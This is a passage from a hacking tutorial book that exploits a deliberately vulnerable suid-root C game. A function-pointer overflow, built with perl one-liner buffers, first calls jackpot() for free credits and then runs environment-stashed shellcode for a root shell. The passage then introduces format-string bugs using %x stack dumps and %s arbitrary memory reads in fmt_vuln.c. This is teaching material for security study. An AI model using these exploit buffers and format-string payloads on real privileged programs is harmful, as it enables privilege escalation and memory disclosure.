int uid;

int credits;

int highscore;

char name[100];

int (*current_game) ();

};

...

// Global variables

struct user player; // Player struct

The name buffer in the user structure is a likely place for an overflow. This buffer is set by the input_name() function, shown below:

// This function is used to input the player name, since

// scanf("%s", &whatever) will stop input at the first space.

void input_name() {

char *name_ptr, input_char='\n';

while(input_char == '\n') // Flush any leftover

scanf("%c", &input_char); // newline chars.

name_ptr = (char *) &(player.name); // name_ptr = player name's address

while(input_char != '\n') { // Loop until newline.

*name_ptr = input_char; // Put the input char into name field.

scanf("%c", &input_char); // Get the next char.

name_ptr++; // Increment the name pointer.

}

*name_ptr = 0; // Terminate the string.

}

This function only stops inputting at a newline character. There is nothing to limit it to the length of the destination name buffer, meaning an overflow is possible. In order to take advantage of the overflow, we need to make the program call the function pointer after it is overwritten. This happens in the play_the_game() function, which is called when any game is selected from the menu. The following code snippet is part of the menu selection code, used for picking and playing a game.

if((choice < 1) || (choice > 7))

printf("\n[!!] The number %d is an invalid selection.\n\n", choice);

else if (choice < 4) { // Otherwise, choice was a game of some sort.

if(choice != last_game) { // If the function ptr isn't set,

if(choice == 1) // then point it at the selected game

player.current_game = pick_a_number;

else if(choice == 2)

player.current_game = dealer_no_match;

else

player.current_game = find_the_ace;

last_game = choice; // and set last_game.

}

play_the_game(); // Play the game.

}

If last_game isn't the same as the current choice, the function pointer of current_game is changed to the appropriate game. This means that in order to get the program to call the function pointer without overwriting it, a game must be played first to set the last_game variable.

reader@hacking:~/booksrc $ ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 70 credits] -> 1

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: 5

The winning number is 17

Sorry, you didn't win.

You now have 60 credits

Would you like to play again? (y/n) n

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 60 credits] ->

[1]+ Stopped ./game_of_chance

reader@hacking:~/booksrc $

You can temporarily suspend the current process by pressing CTRL-Z. At this point, the last_game variable has been set to 1, so the next time 1 is selected, the function pointer will simply be called without being changed. Back at the shell, we figure out an appropriate overflow buffer, which can be copied and pasted in as a name later. Recompiling the source with debugging symbols and using GDB to run the program with a breakpoint on main() allows us to explore the memory. As the output below shows, the name buffer is 100 bytes from the current_game pointer within the user structure.

reader@hacking:~/booksrc $ gcc -g game_of_chance.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) break main

Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41.

(gdb) run

Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at game_of_chance.c:41

41 srand(time(0)); // Seed the randomizer with the current time.

(gdb) p player

$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>,

current_game = 0}

(gdb) x/x &player.name

0x804b66c <player+12>: 0x00000000

(gdb) x/x &player.current_game

0x804b6d0 <player+112>: 0x00000000

(gdb) p 0x804b6d0 - 0x804b66c

$2 = 100

(gdb) quit

The program is running. Exit anyway? (y or n) y

reader@hacking:~/booksrc $

Using this information, we can generate a buffer to overflow the name variable with. This can be copied and pasted into the interactive Game of Chance program when it is resumed. To return to the suspended process, just type fg, which is short for foreground.

reader@hacking:~/booksrc $ perl -e 'print "A"x100 . "BBBB" . "\n"'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAABBBB

reader@hacking:~/booksrc $ fg

./game_of_chance

5

Change user name

Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]

[You have 60 credits] -> 1

[DEBUG] current_game pointer @ 0x42424242

Segmentation fault

reader@hacking:~/booksrc $

Select menu option 5 to change the username, and paste in the overflow buffer. This will overwrite the function pointer with 0x42424242. When menu option 1 is selected again, the program will crash when it tries to call the function pointer. This is proof that execution can be controlled; now all that's needed is a valid address to insert in place of BBBB.

The nm command lists symbols in object files. This can be used to find addresses of various functions in a program.

reader@hacking:~/booksrc $ nm game_of_chance

0804b508 d _DYNAMIC

0804b5d4 d _GLOBAL_OFFSET_TABLE_

080496c4 R _IO_stdin_used

w _Jv_RegisterClasses

0804b4f8 d __CTOR_END__

0804b4f4 d __CTOR_LIST__

0804b500 d __DTOR_END__

0804b4fc d __DTOR_LIST__

0804a4f0 r __FRAME_END__

0804b504 d __JCR_END__

0804b504 d __JCR_LIST__

0804b630 A __bss_start

0804b624 D __data_start

08049670 t __do_global_ctors_aux

08048610 t __do_global_dtors_aux

0804b628 D __dso_handle

w __gmon_start__

08049669 T __i686.get_pc_thunk.bx

0804b4f4 d __init_array_end

0804b4f4 d __init_array_start

080495f0 T __libc_csu_fini

08049600 T __libc_csu_init

U __libc_start_main@@GLIBC_2.0

0804b630 A _edata

0804b6d4 A _end

080496a0 T _fini

080496c0 R _fp_hw

08048484 T _init

080485c0 T _start

080485e4 t call_gmon_start

U close@@GLIBC_2.0

0804b640 b completed.1

0804b624 W data_start

080490d1 T dealer_no_match

080486fc T dump

080486d1 T ec_malloc

U exit@@GLIBC_2.0

08048684 T fatal

080492bf T find_the_ace

08048650 t frame_dummy

080489cc T get_player_data

U getuid@@GLIBC_2.0

08048d97 T input_name

08048d70 T jackpot

08048803 T main

U malloc@@GLIBC_2.0

U open@@GLIBC_2.0

0804b62c d p.0

U perror@@GLIBC_2.0

08048fde T pick_a_number

08048f23 T play_the_game

0804b660 B player

08048df8 T print_cards

U printf@@GLIBC_2.0

U rand@@GLIBC_2.0

U read@@GLIBC_2.0

08048aaf T register_new_player

U scanf@@GLIBC_2.0

08048c72 T show_highscore

U srand@@GLIBC_2.0

U strcpy@@GLIBC_2.0

U strncat@@GLIBC_2.0

08048e91 T take_wager

U time@@GLIBC_2.0

08048b72 T update_player_data

U write@@GLIBC_2.0

reader@hacking:~/booksrc $

The jackpot() function is a wonderful target for this exploit. Even though the games give terrible odds, if the current_game function pointer is carefully overwritten with the address of the jackpot() function, you won't even have to play the game to win credits. Instead, the jackpot() function will just be called directly, doling out the reward of 100 credits and tipping the scales in the player's direction.
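As a rough sketch of what the overflow buffer has to contain, the helper below builds it in memory: 100 bytes of padding followed by a four-byte address stored least significant byte first, as the x86 expects. The name build_overflow() and the NAME_LEN constant are assumptions made for this illustration; the address itself comes from the nm listing above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NAME_LEN 100   /* distance from name to current_game, from GDB */

/* Fill out (at least NAME_LEN + 4 bytes) with padding followed by the
 * 32-bit address, least significant byte first, as x86 stores it.
 * Returns the number of bytes written. */
size_t build_overflow(unsigned char *out, uint32_t addr) {
    memset(out, 'A', NAME_LEN);
    for (int i = 0; i < 4; i++)
        out[NAME_LEN + i] = (unsigned char)((addr >> (8 * i)) & 0xff);
    return NAME_LEN + 4;
}
```

Passing 0x42424242 reproduces the test buffer that ends in BBBB, while passing 0x08048d70 ends the buffer with the bytes 0x70, 0x8d, 0x04, and 0x08.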

This program takes its input from standard input. The menu selections can be scripted in a single buffer that is piped to the program's standard input. These selections will be made as if they were typed. The following example will choose menu item 1, try to guess the number 7, select n when asked to play again, and finally select menu item 7 to quit.

reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 60 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 20

Sorry, you didn't win.

You now have 50 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 50 credits] ->

Thanks for playing! Bye.

reader@hacking:~/booksrc $

This same technique can be used to script everything needed for the exploit. The following line will play the Pick a Number game once, then change the username to 100 A's followed by the address of the jackpot() function. This will overflow the current_game function pointer, so when the Pick a Number game is played again, the jackpot() function is called directly.

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\x8d\x04\x08\n" . "1\nn\n" . "7\n"'

1

5

n

5

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAp?

1

n

7

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\x8d\x04\x08\n" . "1\nn\n" . "7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 50 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 15

Sorry, you didn't win.

You now have 40 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 40 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 40 credits] ->

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 140 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 140 credits] ->

Thanks for playing! Bye.

reader@hacking:~/booksrc $

After confirming that this method works, it can be expanded upon to gain any number of credits.

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\x8d\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nJon Erickson\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 140 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 1

Sorry, you didn't win.

You now have 130 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 130 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 130 credits] ->

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 230 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 330 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 430 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 530 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 630 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 730 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 830 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 930 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 1030 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 1130 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 1230 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 1230 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 1230 credits] ->

Thanks for playing! Bye.

reader@hacking:~/booksrc $

As you might have already noticed, this program also runs suid root. This means shellcode can be used to do a lot more than win free credits. As with the stack-based overflow, shellcode can be stashed in an environment variable. After building a suitable exploit buffer, the buffer is piped to game_of_chance's standard input. Notice the dash argument following the exploit buffer in the cat command. This tells cat to pass along its own standard input after the exploit buffer has been sent, returning control of the input to the keyboard. Even though the root shell doesn't display its prompt, it is still accessible and still escalates privileges.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat ./shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./game_of_chance

SHELLCODE will be at 0xbffff9e0

reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n5\n" . "A"x100 . "\xe0\xf9\xff\xbf\n" . "1\n"' > exploit_buffer

reader@hacking:~/booksrc $ cat exploit_buffer - | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 70 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 2

Sorry, you didn't win.

You now have 60 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 60 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 60 credits] ->

[DEBUG] current_game pointer @ 0xbffff9e0

whoami

root

id

uid=0(root) gid=999(reader) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)

Format Strings

A format string exploit is another technique you can use to gain control of a privileged program. Like buffer overflow exploits, format string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format string vulnerabilities and eliminate them. Although format string vulnerabilities aren't very common anymore, the following techniques can also be used in other situations.

Format Parameters

You should be fairly familiar with basic format strings by now. They have been used extensively with functions like printf() in previous programs. A function that uses format strings, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three more arguments to the function (in addition to the format string argument).

Recall the various format parameters explained in the previous chapter.

Parameter   Input Type   Output Type
%d          Value        Decimal
%u          Value        Unsigned decimal
%x          Value        Hexadecimal
%s          Pointer      String
%n          Pointer      Number of bytes written so far

The previous chapter demonstrated the use of the more common format parameters, but neglected the less common %n format parameter. The fmt_uncommon.c code demonstrates its use.

fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack example
   printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

   exit(0);
}

This program uses two %n format parameters in its printf() statement. The following is the output of the program's compilation and execution.

reader@hacking:~/booksrc $ gcc fmt_uncommon.c

reader@hacking:~/booksrc $ ./a.out

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.

count_one: 46

count_two: 113

A is 5 and is at bffff7f4. B is 7.

reader@hacking:~/booksrc $

The %n format parameter is unique in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes the number of bytes that have been written by the function so far to the address in the corresponding function argument. In fmt_uncommon, this is done in two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then printed, revealing that 46 bytes are written before the first %n and 113 before the second.

The stack example at the end is a convenient segue into an explanation of the stack's role with format strings:

printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order: first the value of B, then the address of A, then the value of A, and finally the address of the format string.

The stack will look like the diagram here.

Top of the stack
Address of format string
Value of A
Address of A
Value of B
Bottom of the stack

Figure 0x300-3.

The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.
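The character-by-character loop of a format function can be sketched in a few lines of C. This toy mini_format() is not how any real C library implements printf(); it is a simplified stand-in (the name and the small set of supported parameters are assumptions) that shows the important part: every format parameter simply pulls the next argument with va_arg, whether or not the caller actually supplied one.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Toy formatter: handles only %d, %x, %s, %n and %%.
 * Stores at most size-1 characters plus a terminating NUL and
 * returns the number of characters stored. */
size_t mini_format(char *out, size_t size, const char *fmt, ...) {
    va_list ap;
    size_t used = 0;
    char tmp[32];

    if (size == 0)
        return 0;
    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0'; p++) {
        const char *piece = tmp;
        if (*p != '%') {                 /* ordinary character: copy it */
            tmp[0] = *p;
            tmp[1] = '\0';
        } else {
            p++;                         /* look at the conversion letter */
            if (*p == '\0')
                break;                   /* lone % at the end of the string */
            switch (*p) {
            case 'd': snprintf(tmp, sizeof tmp, "%d", va_arg(ap, int)); break;
            case 'x': snprintf(tmp, sizeof tmp, "%x", va_arg(ap, unsigned int)); break;
            case 's': piece = va_arg(ap, const char *); break;
            case 'n': *va_arg(ap, int *) = (int)used; tmp[0] = '\0'; break;
            default:  tmp[0] = *p; tmp[1] = '\0'; break;   /* covers %% */
            }
        }
        for (; *piece != '\0' && used + 1 < size; piece++)
            out[used++] = *piece;
    }
    va_end(ap);
    out[used] = '\0';
    return used;
}
```

Nothing in the loop checks how many arguments were really passed. If the format string asks for more than the caller pushed, va_arg just keeps walking through whatever memory comes next.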

But what if only two arguments are pushed to the stack with a format string that uses three format parameters? Try removing the last argument from the printf() line for the stack example so it matches the line shown below.

printf("A is %d and is at %08x. B is %x.\n", A, &A);

This can be done in an editor or with a little bit of sed magic.

reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c

reader@hacking:~/booksrc $ diff fmt_uncommon.c fmt_uncommon2.c

14c14

< printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

---

> printf("A is %d and is at %08x. B is %x.\n", A, &A);

reader@hacking:~/booksrc $ gcc fmt_uncommon2.c

reader@hacking:~/booksrc $ ./a.out

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.

count_one: 46

count_two: 113

A is 5 and is at bffffc24. B is b7fd6ff4.

reader@hacking:~/booksrc $

The result is b7fd6ff4. What the hell is b7fd6ff4? It turns out that since there wasn't a value pushed to the stack, the format function just pulled data from where the third argument should have been (by adding to the current frame pointer). This means 0xb7fd6ff4 is the first value found below the stack frame for the format function.

This is an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.

The Format String Vulnerability

Sometimes programmers use printf(string) instead of printf("%s", string) to print strings. Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Examples of both methods are shown in fmt_vuln.c.

fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}

The following output shows the compilation and execution of fmt_vuln.c.

reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln.c

reader@hacking:~/booksrc $ sudo chown root:root ./fmt_vuln

reader@hacking:~/booksrc $ sudo chmod u+s ./fmt_vuln

reader@hacking:~/booksrc $ ./fmt_vuln testing

The right way to print user-controlled input:

testing

The wrong way to print user-controlled input:

testing

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

Both methods seem to work with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.

reader@hacking:~/booksrc $ ./fmt_vuln testing%x

The right way to print user-controlled input:

testing%x

The wrong way to print user-controlled input:

testingbffff3e0

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $
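One way to keep user input from ever being interpreted as a format string is to always pass it as an argument to a constant format. The helper below is a minimal sketch of that idea; format_untrusted() is a hypothetical name, not part of fmt_vuln.c.

```c
#include <stddef.h>
#include <stdio.h>

/* Copy untrusted text into out for display. The text is passed as an
 * argument to a constant "%s" format, so any % characters inside it
 * are treated as data, never as format parameters.
 * Returns what snprintf() returns: the length of the full text. */
int format_untrusted(char *out, size_t size, const char *text) {
    return snprintf(out, size, "%s", text);
}
```

Given the input testing%x, this produces the literal string testing%x, just like the "right way" line in the output above. When the goal is only to print the text, fputs(text, stdout) avoids format parsing altogether.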

When the %x format parameter was used, the hexadecimal representation of a four-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:

%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.

The wrong way to print user-controlled input:

bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

This is what the lower stack memory looks like. Remember that each four-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are?

reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"

%08x.

reader@hacking:~/booksrc $

As you can see, they're the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.
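To see why the dumped words look scrambled, the bytes of each word can be put back in memory order. The sketch below assumes a little-endian machine like the one in these examples; word_to_memory_bytes() is a name invented for this illustration.

```c
#include <stdint.h>

/* Store the four bytes of a 32-bit word in the order they occupy in
 * memory on a little-endian machine: least significant byte first.
 * out receives the four bytes followed by a terminating NUL. */
void word_to_memory_bytes(uint32_t word, char out[5]) {
    for (int i = 0; i < 4; i++)
        out[i] = (char)((word >> (8 * i)) & 0xff);
    out[4] = '\0';
}
```

Feeding it the word 0x78383025 from the dump gives the string %08x, and the next word, 0x3830252e, gives .%08, which is the format string continuing where the first word left off.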

Reading from Arbitrary Memory Addresses

The %s format parameter can be used to read from arbitrary memory addresses. Since it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x

The right way to print user-controlled input:

AAAA%08x.%08x.%08x.%08x

The wrong way to print user-controlled input:

AAAAbffff3d0.b7fe75fc.00000000.41414141

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash in a segmentation fault, since this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.

reader@hacking:~/booksrc $ env | grep PATH

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln

PATH will be at 0xbffffdd7

